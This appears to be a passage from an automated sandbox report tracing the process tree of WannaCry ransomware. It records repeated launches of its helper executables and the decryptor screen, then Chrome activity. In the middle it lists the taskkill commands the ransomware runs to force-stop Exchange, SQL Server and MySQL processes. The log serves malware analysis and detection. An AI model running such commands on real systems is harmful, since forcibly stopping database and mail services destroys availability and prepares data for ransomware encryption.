                                                                                                                                                                    taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:5476
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                      @WanaDecryptor@.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2220
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                        taskdl.exe
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:5408
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:2692
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                            @WanaDecryptor@.exe
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:2176
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                              taskdl.exe
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:3488
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4528
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                  @WanaDecryptor@.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4964
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                                    taskdl.exe
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:1320
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                                                      taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4256
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                        @WanaDecryptor@.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4448
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                                          taskdl.exe
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:5024
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:3820
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                              @WanaDecryptor@.exe
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:1492
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                                                taskdl.exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:2312
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                                                                  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:5764
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                    @WanaDecryptor@.exe
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:5252
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                                                      taskdl.exe
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4928
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        taskkill.exe /f /im Microsoft.Exchange.*
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                        PID:5036
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        taskkill.exe /f /im MSExchange*
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                        PID:5248
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        taskkill.exe /f /im sqlserver.exe
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                        PID:5716
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        taskkill.exe /f /im sqlwriter.exe
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                        PID:2984
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        taskkill.exe /f /im mysqld.exe
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                        PID:2476
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5512
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                          @WanaDecryptor@.exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:2176
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                                                            taskdl.exe
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:512
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:6056
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                @WanaDecryptor@.exe
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:5776
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                                                                  taskdl.exe
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5708
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                                                                                    taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:2672
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                      @WanaDecryptor@.exe
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:4412
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                                                                        taskdl.exe
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:5992
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:6096
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                            @WanaDecryptor@.exe
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:1844
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                                                                              taskdl.exe
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:2716
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:5304
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                                  @WanaDecryptor@.exe
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:3764
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                                                                                    taskdl.exe
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:936
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                                                                                                      taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:3636
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                                        @WanaDecryptor@.exe
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:4260
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                                                                                          taskdl.exe
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:5360
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                                                                                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:5456
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                                              @WanaDecryptor@.exe
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:5656
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                                                                                                taskdl.exe
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:2352
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                                                                                                                  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:4256
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                                                    @WanaDecryptor@.exe
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:1976
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                                                                                                      taskdl.exe
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:5072
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:3464
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                                                                                                          @WanaDecryptor@.exe
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:3816
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                                                                                                            taskdl.exe
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:1508
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:1932
                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                              C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                              PID:4220
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:5528
                                                                                                                                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                PID:5572
                                                                                                                                                                                                                                                              • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                C:\Windows\system32\AUDIODG.EXE 0x39c 0x4a8
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                PID:5508
                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                PID:5288
                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffdd4f4f50,0x7fffdd4f4f60,0x7fffdd4f4f70
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:5472
                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1684 /prefetch:2
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:4628
                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1860 /prefetch:8
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                      PID:1836
                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2284 /prefetch:8
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:2428
                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2988 /prefetch:1
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:3504
                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3044 /prefetch:1
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:5360
                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3768 /prefetch:1
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:5716
                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4580 /prefetch:8
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:2984
                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4592 /prefetch:8
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:3660
                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4840 /prefetch:8
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:5740
                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 /prefetch:8
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                    PID:4464
                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3604 /prefetch:8
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:1832
                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:6040
                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:5460
                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:5512
                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4076 /prefetch:8
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                            PID:404
                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:5280
                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:348
                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:1
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:2536
                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:1
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:3564
                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:6104
                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5520 /prefetch:8
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:4116
                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:5912
                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2512 /prefetch:1
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:4252
                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2516 /prefetch:8
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:4688
